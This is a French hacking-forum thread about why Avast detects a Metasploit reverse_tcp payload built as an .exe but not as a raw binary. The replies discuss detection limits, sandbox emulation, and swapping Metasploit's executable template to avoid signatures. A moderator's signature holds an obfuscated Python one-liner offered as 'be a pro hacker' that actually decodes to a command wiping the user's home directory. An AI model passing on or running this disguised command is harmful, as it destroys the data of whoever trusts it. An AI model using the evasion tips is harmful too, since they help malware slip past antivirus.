Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 19-06-2014 23:27:13

Maxoumax6
N00b
Inscription : 18-06-2014
Messages : 4

Avast et le binaire

Commençant à m'intéresser aux codes de certains des payloads de metasploit et en particulier le reverse_tcp, je me pose une question.

Pourquoi lorsque l'on encode ce payload en binaire de la manière la plus basique (msfencode par ex) c-à-d en ne cherchant pas à le rendre fud, et que l'on fait analyser le binaire à Avast celui-ci n'indique aucune menace, pour autant lorsque ce même payload est cette fois encodé en .exe (mais de la même manière qu'auparavant), alors là Avast le détecte...

Pourtant la signature doit bien se trouver dans le binaire non ?

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 21-06-2014 13:36:12

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Avast et le binaire

La dissimulation de code malveillant est un problème merveilleux.
La détection de code malveillant est un problème non décidable.

« On the Infeasibility of Modeling Polymorphic Shellcode » est une excellente lecture à ce propos.
http://www.cs.columbia.edu/~yingbo/publ … 007-07.pdf

Et avast n'a pas une bonne réputation. C'est important la réputation dans l'homéopathie qu'est l'utilisation d'antivirus smile.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#3 23-06-2014 04:55:59

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Avast et le binaire

Sûrement parce que le format binaire est assez général et peut contenir toutes sortes d'informations, il n'a de sens que pour le programme qui va le lire et dont il sait comment les données sont structurées. Il peut contenir des images, du son, des fonctions, ... deux octets ou quatre peuvent correspondre à la couleur d'un pixel, une adresse mémoire, une clé, il peut être un dump de la mémoire vive...
L'antivirus réagit plutôt à un exécutable PE ou ELF, DLL ... on peut dissimuler des signatures voir même le code d'un virus dans une image JPEG, BMP... par stéganographie, et alors ? cela ne veut pas dire pour autant qu'on peut infecter un ordi par simple visionnage de photos, ça dépend aussi comment l'antivirus a été conçu car il faut aussi raisonner en terme de temps, de ressources d'ordi et d'optimisation.

Hors Ligne

#4 24-06-2014 21:21:28

YAZ
Membre
Inscription : 12-12-2013
Messages : 21

Re : Avast et le binaire

salut,
je vois 2 raisons qui pourraient explirauer ce comportement :
- a la geneation d'un executable, metasploit 'greffe' ton payload a un 'executable template', dont la signature doit etre dans la base de tous les antivirus (et tu peux le changer en bidouillant ton installation, voire, si tu utilises principalement les payloads en tant que executables et non shellcodes, prendre le temps de lire les sources et faire tes propres charges).

- ceci n'est qu'une hypothese car je ne sais pas comment tu as fait tes tests, mais comme dis plus haut, le format binaire est general et peut contenir n'importe quoi, donc avast ne peut l'analyser que statiquement (surement que recherche de signature, et comme montre plus haut, c'est quelque chose "d'assez inefficace" ...), tandis que pour les executables, avast dispose d'une sandbox et peut "l'emuler", et ainsi detecter un comportement suspect (mais elle peut etre neutralisee - bypasee)

Dernière modification par YAZ (24-06-2014 21:27:43)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
12 2070 12-04-2014 08:32:46 par Fuji
4 2803 09-11-2013 22:52:37 par warfares
22 2016 19-09-2012 12:51:02 par noireaude
6 2023 09-06-2011 22:47:23 par noireaude
avast par Veidam
3 1233 20-11-2010 11:54:12 par benybigtarget

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.118 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]